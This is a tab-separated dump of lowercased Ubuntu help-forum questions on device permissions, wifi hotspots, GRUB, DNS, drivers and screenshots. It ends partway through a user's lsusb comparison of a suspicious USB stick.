211739	gammu and device permissions	i have ubuntu server 12.04 lts and on it i have installed gammu . i use it to control my `` nokia 5310 xpress music '' cell phone . now when i run `` gammu -- identify '' it does not work , says i dont have the right device permissions , but it works with sudo gammu -- identify now my nokia device is listed as ttyacm0 in my /dev/ directory ... its permissions are rw for root and dialout ... i tried to change these permissions so that i can use this device with gammu without sudo ... i did sudo chmod 777 /dev/ttyacm0 and it changed the permissions , but still it did not work ... i even went and added a file in /etc/udev/rules.d/ by the name of 40-41-descriptive-name.rules which contained the following line : subsystem== '' usb '' , attr { idvendor } == '' 0421 '' , attr { idproduct } == '' 006b '' , mode= '' 0600 '' , owner= '' myusername '' and then restarted udev but still no luck ... i even did sudo chown myusername /dev/ttyacm0 and gave myself the ownership of the device but still i needed to use sudo to get things done ... btw if i do lsusb i get the following info : bus 002 device 003 : id 0421:006b nokia mobile phones i tried all these ways to change the device permissions so that i could use `` gammu -- identify '' instead of sudo gammu -- identify but no luck . how can i fix this dilemma ?
211744	wireless hotspot configuration and internet browsing	in our campus we have a leased line connection from a service provider , which has an external ip w.x.y.z . this connection is distributed from the server several sub-networks / subnets as follows : faculty : 172.33 ... ... / 255.255.0.0 administration : 172.34 ... ... ./255.255.255.0 students : 172.35 ... ../255.255.216.0 a student has a laptop with a fixed ip address 172.35.23.123 / 255.255.216.0 where the ip address is on the ethernet port . the gateways for internet access are 172.31.1.1 and 172.31.1.2 . further the student has a wireless port which is inaccessible in the hostel area . the os of the student is ubuntu 12.10 . the student in the possession of an android phone on which he wishes to install specific software and therefore wishes to activate the internet therein . the student has already attempted the wireless hotspot solution which works for 12.04 but has not been successful . various instructions on the internet have helped the student to do the following installation of dhcp server and hostapd : sudo apt-get install isc-dhcp-server sudo apt-get install hostapd file : /etc/network/interfaces auto lo iface lo inet loopback auto wlan0 iface wlan0 inet static address 10.10.0.1 netmask 255.255.255.0 dns-nameservers 172.31.1.1 172.31.1.2 file : /etc/dhcp/dhcpd.conf subnet 10.10.0.0 netmask 255.255.255.0 { range 10.10.0.2 10.10.0.4 ; option routers 10.10.0.1 ; option domain-name-servers 172.31.1.1 172.31.1.2 ; default-lease-time 6000 ; max-lease-time 72000 ; } file : /etc/hostapd/hostapd.conf interface=wlan0 driver=nl80211 ssid=my_hotspot channel=1 hw_mode=g auth_algs=1 wpa=3 wpa_passphrase=1234567890 wpa_key_mgmt=wpa-psk wpa_pairwise=tkip ccmp rsn_pairwise=ccmp file : /etc/default/hostapd run_daemon=”yes” daemon_conf=”/etc/hostapd/hostapd.conf” daemon_opts=”-dd” file : /etc/default/isc-dhcp-server interfaces=”wlan0” file : /etc/rc.local iptables -t nat -a postrouting -s 10.10.0.0/16 -o eth0 -j masquerade exit 0 after all the configuration , the computer is restarted . the student can see that the hotspot named “my_hotspot” is available . the hotspot also awards an address to the android phone . the student will now be able to browse the internet .
211750	taking screenshots of all ( or specific ) virtual desktops/workspaces ( or : windows beyond/larger than current desktop ) ?	i often need to take screenshots of windows that are larger than the currently shown desktop . i 'm on ubuntu 11.04 , gnome-about says version : 2.32.1 ; compiz -- version says compiz 0.9.4.0 -- and i have four virtual desktops/workspaces , which are arranged as such : the above images were obtained by moving into each separate workspace , and taking a screenshot via printscreen key - that is to say , gnome-screenshot . ( i am aware that there are better ways of obtaining firefox shots , like the `` page saver '' addon - the above is taken simply as an example of a generic oversized window ) . edit : i 'm apparently using the wrong nomenclature here ( found via xorg - get current virtual desktop - number/name/tag/id ? - unix and linux ) - it turns out , in the above example , i still have only one workspace ; what is changed , instead , is the viewport - this is what wmctrl -d shows on each of the `` virtual desktops '' : $ wmctrl -d 0 * dg : 2048x1200 vp : 0,0 wa : 0,1 1024x598 workspace 1 $ wmctrl -d 0 * dg : 2048x1200 vp : 0,600 wa : 0,1 1024x598 workspace 1 $ wmctrl -d 0 * dg : 2048x1200 vp : 1024,0 wa : 0,1 1024x598 workspace 1 $ wmctrl -d 0 * dg : 2048x1200 vp : 1024,600 wa : 0,1 1024x598 workspace 1 so to switch between `` virtual desktops '' from the command line , i should in fact change the `` viewport '' , as in : wmctrl -o 1024,0 obviously , moving to each virtual desktop , taking a screenshot and stitching them together - and finally cutting the application window - is a bit tedious , so i was wandering if there was a tool ( preferably command line ) that would allow me to pick a window that is larger than the current desktop , and takes a screenshot of its entire contents , in one go . there could be two scenarios here as well : a larger-than-desktop window is moved so it takes up space on several virtual desktops ( like the images above show ) a larger-than-desktop window is moved outside of the total size of all virtual desktops ( from the perspective of top-left desktop in composition above , imagine moving the application window towards the top-left , and outside of desktop area - as opposed to it being moved bottom right as shown above ) the first case is possible , if not in any other way , then manually ( as i did it above ) -- and for the second case , i guess it should be possible for an application to either `` move '' the window briefly to the total all-desktops area - or create a `` virtual '' graphics context not shown on screen , and render the window there ( although , i do n't know enough details to know for sure ) . i have tried the following tools so far : gnome-screenshot xwd scrot import ( imagemagick ) and they will all capture just a `` corner '' of the entire application window , which is shown on the current desktop ( in a situation as shown above ) . when trying to capture `` root '' or `` full-screen '' , all of these capture just the currently rendered desktop ( not the total area of all virtual desktops ) . i also tried shutter ( 0.87.2 rev.1071 ) , and while i 've found information that from version 0.86.4 onwards , `` you can capture all virtual desktops now . shutter will go through all of them , take a picture of every one and compose them into a one large screenshot '' - i did give a try clicking on `` capture all workspaces '' - but it only takes a shot of the current workspace/desktop ; window captures are likewise cut at the limits of current desktop ( or fail with `` error while taking the screenshot : maybe mouse pointer could not be grabbed or the selected area is invalid . '' if the window fully sits in a virtual desktop other than the current one ) . then i read that there is a screenshot plugin for compiz - and since here compiz manages the virtual desktops , i thought it could handle the total area - but there are no settings there ( in compizconfig settings manager ) , but : `` enable plugin '' , an output directory , and a button to enable and set hotkeys for `` initiate rectangle screenshot '' -- and since apparently only thing you can do is drag with the mouse to specify a rectangular area , i doubt that plugin would help capturing the total area in one go . thus , i 'd like to ask for some suggestions about tools , that can : capture the total area ( all workspaces/virtual desktops ) in one go ; or capture the total area of the selected window , even if it is pushed outside of the currently rendered desktop ( also in one go ) i would prefer something that deals with this stuff in memory - i myself could come up with something worse : such as a bash script that sends keystrokes to change desktops ( or just via wmctrl ) , and takes individual screenshots there -- but that would be a pain to use , especially since i 'd be visually exposed to the `` desktop switching '' while the screenshot is being captures ... if not any complete programs , suggestions for c/perl/python apis that can access bitmap data on all/any virtual desktops would be great too .
211752	i ca n't start my ubuntu 12.10 after instalation	i use the hp pavilion dm1 and have installed ubuntu 12.10 . but when i start my pc it will not start after appearing grub appears an orange screen and nothing else . so , i need to restart the pc in order to run ubuntu . i always need to restart your computer for it to run . what can i do ?
211756	nautilus automount devices	when opening nautilus it shows my devices ( which are actually just other partitions ) like this : however , they are not mounted . when i now click them , they get mounted . what do i have to do to have them mounted automatically ?
211757	how do i set a static dns nameserver address on ubuntu server ?	i am trying statically to set dns server addresses in my ubuntu server running as virtual machine . i followed all recommendations on official ubuntu support pages but i simply can not get rid of my isp 's dns servers set by dhcp . i assigned br0 interface on my host machine static ip address and eth0 on vm to use google dns and my own local dns running on the second vm by setting it in /etc/network/interfaces . tried to fiddle with head base and tail files in /etc/resolvconf/resolv.conf.d/ and tried to shuffle interface-order in /etc/resolvconf/interface-order but when i restarted network service i got the isp 's dns addresses back every time . is there a way that i can disable resolvconf and set up my resolv.conf file manually as i always did on red hat ? or at can you tell me which hook script keeps putting isp dnss in resolv.conf ? my isp do n't allow me to change dhcp settings on my router so i can not do it that way . why is such a simple thing such as setting dns servers got so complicated ? ? ?
211759	a tls packet with unexpected length was received	what kind of errors is this ? i am getting this error while doing the update of my cache with sudo apt-get update error : err https : //private-ppa.launchpad.net precise/main i386 packages gnutls_handshake ( ) failed : a tls packet with unexpected length was received . image for reference :
211761	is there an audio player for ubuntu that can automatically decompress and play gzipped music ?	i 'm looking at ways to reduce the amount of space taken up by my large collection of music , mostly ogg vorbis with the occasional mp3 . what prompted this was thinking ahead to potentially using an ubuntu tablet with limited storage . consequently , i thought of writing a script to gzip each track ( i.e . foobar.ogg becomes foobar.ogg.gz ) . the problem is , i then need an audio player smart enough to decompress the gzipped music on the fly , find out what format it actually is and play it as normal . i realise that i could probably do this from the command line by unzipping each track to stdout and piping it to mplayer or something but i 'm really looking for a desktop application . google did n't turn up anything conclusive , so is anyone else doing this and if so how ? thanks .
211763	enable overlay-scrollbar in xubuntu 12.10 ( xfce 4.10 )	i just did a release upgrade from ubuntu 12.04 to 12.10 and i noticed that even though i have the overlay-scrollbar package installed , it is not used . i have tried purging and reinstalling the package , but nothing has changed even after reboot ( see screenshot ) . what can i try to do to get the overlay-scrollbars working again ?
211764	grub bootloader error every second boot	every time i turn on my laptop i get a grub bootloader error . then i press ctrl-alt-delete to restart . after it restarts , the grub boot loader is working . this has happened since i upgraded a windows 7 partition to windows 8 . grub still calls it windows 7 ( now changed the name to windwows 8 ) . i get this error : error : no such device : d1b5f862-f834-4269-8d44-c7a70e24c9f4 grub rescue >
211767	what is the name of the application to find automatically the package to install ?	i would like to know what is the name of the ubuntu package that finds out for us on the terminal what package to install . as an example , imagine that i do n't have gparted installed . i just open the terminal and type gparted on it , and a message like this appears : '' gparted '' was not found . the program 'gparted ' is currently not installed . you can install it by typing : sudo apt-get install gparted so my question is : what is the name of the package that allows this message to appear ?
211770	how do i enable the wireless adapter on a lenovo x100e ?	i 'm very fresh to ubuntu and i just downloaded ubuntu 12.10 on my lenovo x100e computer . i 'm having issues with my wireless adapter . it says the adapter was turned off by a hardware switch . the issue is that my laptop has no hardware switch for wireless ! the way i used to enable/disable wireless was through fn and f5 keys . when i tried to turn it on from the network setting , it did n't allow me . it keeps turning off straight away . if anyone has any advice or help to give i 'd be very grateful . my wireless adapter is the following : realtek 802.11bgn looking forward to hearing from you and thank you so much in advance !
211772	help installing on asus eeepad 1025c	this is in regards to ubuntu 12.10 . i am not able to boot the live environment just gives me output then blanks out and stays at flashing cursor , i am however able to boot up the installer and connect to wifi and install the os no problem however it will not boot up and i 'm not sure why is booting like normal printing out the list of starting services and what not then just stops and sits forever . i 'm thinking it could be graphics related since the machine never starts x ( i think ) . any input will be greatly appreciated and i will be happy to provide more information to help solve the problem , thank you all .
211773	how to run a one-line bash command with a keyboard shortcut ?	i just made a custom keyboard shortcut , which is to execute the following command : if [ [ `banshee -- query-current-state | grep playing` ] ] ; then banshee -- pause ; else banshee -- play ; fi while this works flawlessly in a terminal , when i try to run it via the shortcut i just made i get this error : error while trying to run ( if [ [ `banshee -- query-current-state | grep playing` ] ] ; then banshee -- pause ; else banshee -- play ; fi ) which is linked to the key ( xf86audioplay ) what am i doing wrong ?
211777	ssh : connect to host xxx.xxx.xxx.xxx port 22 : connection refused	well im trying to connect to a client machine using ssh using this command ssh root @ ip-of-server it immediately slaps me with this error ssh : connect to host xxx.xxx.xxx.xxx port 22 : connection refused then i tried to access a local server using same command it worked . for further experiment i tried to do ssh umair @ 127.0.0.1 it displayed the same error whats wrong here . any suggestion
211778	empathy logs into chat networks , without beeing started ?	i have empathy installed on my ubuntu 12.04 with gnome 3 . i appear to be online in the chat networks when my computer is connected to the internet . however , i did not even start empathy , at least not manually . how can i change this behaviour ?
211786	lenovo ideapad z570 wireless adapter is n't working properly in ubuntu 12.04	so , the anamnesis : machine : lenovo ideapad z570 wifi-adapter : intel centrino wireless-n 1000 os : ubuntu 12.04 $ uname -a $ linux username-ideapad-z570 3.2.0-32-generic # 51-ubuntu smp wed sep 26 21:33:09 utc 2012 x86_64 x86_64 x86_64 gnu/linux wifi-driver : driver=iwlwifi driverversion=3.2.0-32-generic firmware=39.31.5.1 build 35138 everything worked just fine until once i made a big though an unobvious mistake : i turned off my laptop 's wifi-adapter via hardware switch during an active networking session . the connection went down of course , but it never come up after i turned it back on . network manager applet shows an empty wireless icon , as if the adapter was turned off . no hotspots are being found . iwlist scan returns `` failed to read scan data : network is down '' for wlan0 . dmesg | grep iwl returns [ 15.727561 ] iwlwifi 0000:03:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 15.727616 ] iwlwifi 0000:03:00.0 : setting latency timer to 64 [ 15.727670 ] iwlwifi 0000:03:00.0 : pci_resource_len = 0x00002000 [ 15.727673 ] iwlwifi 0000:03:00.0 : pci_resource_base = ffffc90000c7c000 [ 15.727675 ] iwlwifi 0000:03:00.0 : hw revision id = 0x0 [ 15.728145 ] iwlwifi 0000:03:00.0 : irq 44 for msi/msi-x [ 15.728289 ] iwlwifi 0000:03:00.0 : detected intel ( r ) centrino ( r ) wireless-n 1000 bgn , rev=0x6c [ 15.728452 ] iwlwifi 0000:03:00.0 : l1 enabled ; disabling l0s [ 15.749284 ] iwlwifi 0000:03:00.0 : device eeprom ver=0x15d , calib=0x6 [ 15.749289 ] iwlwifi 0000:03:00.0 : device sku : 0x50 [ 15.749292 ] iwlwifi 0000:03:00.0 : valid tx ant : 0x1 , valid rx ant : 0x3 [ 15.749375 ] iwlwifi 0000:03:00.0 : tunable channels : 13 802.11bg , 0 802.11a channels [ 15.921795 ] iwlwifi 0000:03:00.0 : loaded firmware version 39.31.5.1 build 35138 [ 15.924852 ] ieee80211 phy0 : selected rate control algorithm 'iwl-agn-rs' [ 18.198740 ] iwlwifi 0000:03:00.0 : l1 enabled ; disabling l0s [ 18.262374 ] iwlwifi 0000:03:00.0 : l1 enabled ; disabling l0s iwconfig returns ( for wlan0 ) : wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=14 dbm retry long limit:7 rts thr : off fragment thr : off power management : off as of rfkill - it shows , that no devices are blocked : 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no sudo lshw -class network returns ( part of it was in russian and translation is provided , possibly not a very precise one ) : *-network disabled description : wireless interface product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 00 serial â : 74 : e5:0b : ce:7c:20 capacity : 64 bits frequency : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-32-generic firmware=39.31.5.1 build 35138 latency=0 link=no multicast=yes wireless=ieee 802.11bg resources : irq:44 memory : f1500000-f1501fff what i already tried and what did n't work : ifdown / ifup rfkill block all / rfkill unblock all ( which is obvious , since , as i mentioned above , there are no devices blocked ) rmmod iwlwifi / modprobe 11n_disable=0 i 'm really , really looking forward for your help . update : forgot to mention : under win7 adapter works just fine . update 2 : well , there 's a definite progress : i managed to engage wlan0 via sudo ip link set wlan0 up . besides , i found out , that iwlist scan has to be run by a superuser to produce meaningful result . i did so and ~finally ! ~ got a list of my aps ! so now i 'll try to connect manually by setting ap address , essid and wpa-key in iwconfig and report the result here back later . but anyway : any idea what can be the problem ? something with networkmanager perhaps ? because i had an issue with it recently after updating , which was resolved by downgrading my networkmanager ... could this be , that i accidentally installed the latest version again ?
211788	ubuntu 11.10 classic desktop opens all windows twice with same	all programs ( incl internet ) appear twice in the bottom panel , once you close one tab , both close . how can i get this fixed ? thanx a lot in advance
211793	removing package error	error shown on terminal : sudo : unable to open /var/lib/sudo/jianyue/0 : read-only file system w : not using locking for read only lock file /var/lib/dpkg/lock e : unable to write to /var/cache/apt/ e : the package lists or status file could not be parsed or opened . if you need more infos , please help .
211794	can not create files except in home partition	on my system i have made 3 partitions except home partition but ubuntu does n't let me create or delete any files on those partitions . even copy and paste options are not available . using my poor knowledge i made some file using terminal but i do n't know how to add files to those partitions . please anybody help me . i 'm new to ubuntu . my experience with ubuntu is only two weeks .
211797	how do i make ubuntu `` power loss proof '' ?	i like to run a system unattended for every day 'kiosk ' use . however , the system may be powered off anytime without someone doing a proper shutdown before . by default , ubuntu is not expected to be shut down by power loss . after rebooting after a power loss , fsck may be run to check the file system , and fsck may tell the system to reboot after it has finished . so even if no configuration data gets corrupted , the machine may not boot well after power loss . so i tested some workarounds : 1 ) change the root mount fsck priority to 0 ( last field in fstab root entry ) that prevents running fsck after every power loss . however , the the system may boot with root mounted read-only then , which is not expected by many services and results in a console login prompt instead the graphical login . 2 ) replace errrors=remount-ro by errors=continue . this gives a bad feeling that further data loss may occur by an incosistent filesystem . however , with fsck enabled again , it should increase the system 's boot propability after power loss . so i dropped 1 ) . 3 ) reconfigure grub2 to use a normal default option timeout after a failed boot . for that , i 've added grub_recordfail_timeout=0 to /etc/default/grub . hoever , it is hard to know if these hacks make the system power loss proof . any ideas ? any more one can do ?
211798	ubuntu install button not working	i have a computer on which windows xp recently crashed , so i thought i would try ubuntu . i downloaded ubuntu 32-bit from the website and burned it to a dvd using nero . i set the boot menu of my computer to boot from cd/dvd . after , i booted from the dvd . it was very slow ( i think this was because i have ide dvd rom ) and a purple screen launched then the try ubuntu or install ubuntu menu suddenly came in . i clicked 'install ubuntu ' button several hundred times but it did n't work .
211799	can not mount external harddrive	trying to plug it in , and here is the error : unable to mount my passport error creating mount point `/media/jianyue/my passport ' : read-only file system
211800	can i install ubuntu desktop 12.10 on laptop samsung np300e5x-s01ae ?	i 've tried to install ubuntu 12.04 64 bit , but i have problem after i tried to install it the laptop stop working and no bios screen i get back to warranty center and they changed the motherboard : ( what should i do to make the install work ? specifications processor : brand/family : intel core i5-3210m cpu speed : 2.5ghz cache memory : 3mb turbo boost : 3.1ghz '' ram '' memory : ram type : ddr3 installed ram : 4gb ram fsb speed : 1600mhz ram up to : 8gb drives : hard drive type : hdd hard drive capacity : 500gb rotational speed ( rpm ) : 5400rpm hard drive connection : sata cd/dvd drive : dvd super multi dl memory card reader : sd , sdhc , sdxc card reader graphic card : vga brand : nvidia vga model : geforce gt 610m vga dedicated memory : 1gb vga memory type : ddr3 screen : screen type : led backlight screen resolution : 1366x768px screen size : 15.6inch high definition : hd internet : bluetooth : bluetooth v 4.0 lan : 10/100/1000 base-t ethernet wifi : wifi 802.11 b/g/n interface : usb : 3xusb 2.0 hdmi : 1xhdmi vga/out : yes audio ports : yes multimedia : speaker : yes web camera : 1.3mp microphone : yes touch pad : yes software : operating system : freedos battery : battery tech/cells : 6-cell lithium-ion charger : ac power adapter
211804	wrong underscan settings after reboot in 12.10 x64 , with ( fglrx open source ) amd hd7850	i used amd ccc ( administrative ) to disable underscanning , but after reboot it underscans again , so i have to move the slider again after every reboot . i tryed ccc non-administrative , but still have the same problem .
211809	ubuntu 12.04 does not power off	i 'm not able to power off ubuntu , which was working fine a couple of days ago . when i click shut down , a blank screen appears and stays like that forever . it does not power off by itself and i 'm forced to physically power off using the power button . i 've even tried 'sudo shutdown now ' and 'sudo shutdown -h now ' and both do n't seem to work ! please suggest some fix for this problem . thanx in advance . edit : restart works fine . also 'sudo poweroff ' does n't work !
211817	problems with second display	first of all this problem is only with kde . im configuring my displays with nvidia-settings . i set to both right hz and resolution but on second display allways there is some line that is separate moving objects , like when i move window arround the screen some line moving from buttom to top of the screen . ths is very bad at movies : ( before few minutes i made a photo with my dslr on high speed when moving an object on second display : http : //postimage.org/image/bspv69jzr/ please help : )
211818	do you know a clever way to minimize usb latency ( usb sound ) ?	so in linux i run a virtual machine - > because i need my midi compatible + asio . but i was thinking , if anyone out there knew some tricks/hacks to improve latency with usb . ( if it 's even possible )
211828	distorted graphics , problems with starting up	using the newest version of ubuntu , freshly installed . nvidia geforce gtx 560 ti . it 's mostly the font that does n't render well , i think . small logos do it too , sometimes . screenshot to clarify ( see bookmarks , search bar , etc . ) another screenshot and , sometimes when i start up , i get only a black screen saying [ ok ] . i can move my mouse around , but nothing helps , except for restarting . also , my desktop picture does n't stay the same . every time i start up ubuntu it goes back to the standard purple background . they 're not very serious problems , but it 's all a little annoying . thanks in advance for your help .
211831	how to add custom mail id in empathy	how to add custom mail id in telepathy account manager/empathy ? i.e i want to add your-name @ yourcompany.org which was created in google apps . i want to use it as gmail id . i tried logging in by selecting gmail account , but it results invalid username/password . my system info : ubuntu 12.10 , empathy 3.6.0.3
211832	how do i delete files/folders from ubuntu one web interface ?	i see this questions has been asked twice already ; how do i delete files from ubuntu one ? how can i delete files in ubuntu one ? but the answers do not work for me . i do not see a delete option when i click the more link . i only see `` share folder '' and `` stop syncing '' . i clicked stop syncing and nothing happens . i would like to delete an entire folder .
211834	ubuntu 12.10 wifi problems	i have a 32 bit machine running ubuntu 12.10 with wifi on it . i have a wpa2 network at home , but if i leave the usb adapter plugged in while it boots , it infinitely keeps asking for the network password but never connects . if i plug it in after boot , it will connect but then i ca n't access anything on the lan or internet because `` the dns servers are unreachable '' . now , if i leave the computer on a while , i get lucky sometimes and it magically decides to connect for a little bit , lock the machine though and the internet 's gone again . the weirdest thing , is when i am connected but ca n't get to the internet , i do a netstat or ifconfig wlan0 , i do have an ip address and everything . it says i 'm connected but its not . i have a realtek rtl8188cu usb adapter .
211837	how can i get the essid name only that i connected with ?	i tried $ iwconfig | grep wlan0 but all i got was the line that my connected essid name exists . but i need only the name . how do i get just the name ?
211839	ubuntu 12.10 upgrade	i am trying to upgrade from 12.04 to 12.10 . i followed ubuntu 's instructions on the website and i 'm still stuck . should i just manually do the upgrade instead ?
211840	upgrade php5-gd on 12.04 ?	i 'm working with the gd library for image manipulation , to which i need to create some transparent pngs . instead , i 'm getting a black background . i 've looked everywhere on how to generate a blank , transparent png canvas with it and all the answers just do n't work for me . on further inspection , i 'm working with an old gd version : the functions needed to create a transparent png requires 2.0.1 altough 2.0.28 or later is recommended . i installed php5-gd with apt-get , and aptitude have n't found new packages . do i have to add a new ppa ? where can i find it ? what about forcing a version ? thanks in advance !
211841	12.10 shutdown/power-up issue	i have just upgraded to 12.10 on a shuttle xpc which i use mainly for xbmc and have a problem with shut down/power up . when i shut down from within xbmc the box seems to shut down correctly , but it wo n't always start again . it hangs before it reaches the point where it mounts the disc 's . if i disconnect power shortly and then start up again everything works as it should . it is n't quite repeatable and it does not seem to happen if i exit xbmc and then power down . during power up there seems to be an issue about timing when mounting discs . what could it be ?
211843	why i ca n't see the thumbnails in nautilus ?	problem loading thumb previews : this started to happen after upgraded ubuntu from 12.04 to 12.10 .
211845	edit windows boot loader from ubuntu	i am using ubuntu 12.10 , and windows 7 . i accidentally removed the windows option from the windows boot loader using easybcd . i do not know how to access the windows boot loader configuration files . i am a novice , but i can execute commands at the terminal .
211847	totem : how to change playlist contents ' name ?	i added several online radio feeds to totem playlist , but what is displayed on the sidebar are the names of the songs that were playing when it was added to the playlist instead of the radio 's name . for example , the radio `` classical guitar '' shows instead `` debussy - golliwog 's cakewalk '' and the bossa nova channel shows as `` nancy wilson - how insensitive '' . please advise me on how to change their names and in what folder is this info stored ? thanks a bunch ! !
211848	how do you use or what is wrong with ubuntu-support-status ?	i read this : `` the ubuntu-support-status command will print the exact status of your system. `` but when i try i get this : $ ubuntu-support-status traceback ( most recent call last ) : file `` /usr/bin/ubuntu-support-status '' , line 105 , in < module > ( still_supported , support_str ) = get_maintenance_status ( cache , pkg.name , support_tag ) file `` /usr/bin/ubuntu-support-status '' , line 37 , in get_maintenance_status raise exception ( `` no date tag found '' ) exception : no date tag found`
211851	how to set keyboard shortcuts from a script	i appear to be suffering from this bug that means my custom keyboard shortcuts are lost on reboot . i have 8 custom shortcuts , and re-setting all 8 via the gui method for setting keyboard shortcuts is tedious . i am using 12.10 and unity . the keyboard shortcuts i want to customise are '' shift to workspace left '' ( right/above/below ) - with shortcut ctrlaltl ( h/k/j ) '' move window one workspace to the left '' ( right/up/down ) - with shortcut shiftctrlaltl ( h/k/j ) . ( at least those are the names i see in the keyboard shortcut dialogs . ) so until the bug is fixed , i would like to be able to run a script to set all 8 after i have logged in . so what command line program and options do i need to run to set a keyboard shortcut ?
211853	how to read content of modified usb thumb drive ?	i discovered someone who i did n't want harm to befall had purchased an `` internet radio + tv player '' usb device . i decided to see if i could view the contents of the device to see if any of it was malicious , but it seems that the device does n't behave like a data storage device as i would have expected . i had previously thought this device was a simple autorun executable on a usb stick , but it appears there is more to this thing than i had thought previously . whatever means it has of operating on a windows machine is n't the same path available on a linux machine it appears . i had gone to a conference where usb keys were being handed out and it just so happens that the exact same generic appearance and what i perceived to be same form factor , but closer examination reveals differences . below is a photo of the two devices side by side where the upper device has had a gimp alteration to blur out the company logo . the upper usb device in the photo is a standard 2gb usb drive where the lower is the usb thumb drive i 'm attempting to examine . the unit in question has the characters bcw017 etched on the enclosure/surface of the connector whereas the 2gb drive is void of these markings . there are no other noticeable visual differences between the two other than branding . is there any way to read the content of the mysterious usb drive or is it embedded hardware i 'm seeing here ? running lsusb reveals this information about the internet radio/tv usb : bus 001 device 023 : id 6610:6610 device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x6610 idproduct 0x6610 bcddevice 0.00 imanufacturer 1 produc iproduct 2 udisk2 . iserial 3 2012061513070156 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 32 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0x80 ( bus powered ) maxpower 100ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 2 binterfaceclass 8 mass storage binterfacesubclass 6 scsi binterfaceprotocol 80 bulk-only iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 0 device status : 0x0000 ( bus powered ) running lsusb against the 2gb usb reveals : bus 001 device 022 : id 090c:1000 silicon motion , inc. - taiwan ( formerly feiya technology corp. ) 64mb qdi u2 disk device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x090c silicon motion , inc. - taiwan ( formerly feiya technology corp. ) idproduct 0x1000 64mb qdi u2 disk bcddevice 10.00 imanufacturer 1 iproduct 2 iserial 3 11050762000196 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 32 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0x80 ( bus powered ) maxpower 200ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 2 binterfaceclass 8 mass storage binterfacesubclass 6 scsi binterfaceprotocol 80 bulk-only iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 255 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x02 ep 2 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 255 device qualifier ( for other device speed ) : blength 10 bdescriptortype 6 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 bnumconfigurations 1 device status : 0x0000 ( bus powered ) the difference between the two comparing results of lsusb : left file : withradiotv.log right file : with2gb.log 716 bus 001 device 023 : id 6610:6610 < > 716 bus 001 device 022 : id 090c:1000 silicon motion , inc. - taiwan ( formerly feiya technology corp. ) 64mb qdi u2 disk -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 725 idvendor 0x6610 < > 725 idvendor 0x090c silicon motion , inc. - taiwan ( formerly feiya technology corp. ) 726 idproduct 0x6610 726 idproduct 0x1000 64mb qdi u2 disk 727 bcddevice 0.00 727 bcddevice 10.00 728 imanufacturer 1 produc 728 imanufacturer 1 729 iproduct 2 udisk2 . 729 iproduct 2 730 iserial 3 2012061513070156 730 iserial 3 11050762000196 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 741 maxpower 100ma < > 741 maxpower 200ma -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 760 wmaxpacketsize 0x0040 1x 64 bytes < > 760 wmaxpacketsize 0x0200 1x 512 bytes 761 binterval 0 761 binterval 255 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 765 bendpointaddress 0x01 ep 1 out < > 765 bendpointaddress 0x02 ep 2 out -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 770 wmaxpacketsize 0x0040 1x 64 bytes < > 770 wmaxpacketsize 0x0200 1x 512 bytes 771 binterval 0 771 binterval 255 772 device qualifier ( for other device speed ) : 773 blength 10 774 bdescriptortype 6 775 bcdusb 2.00 776 bdeviceclass 0 ( defined at interface 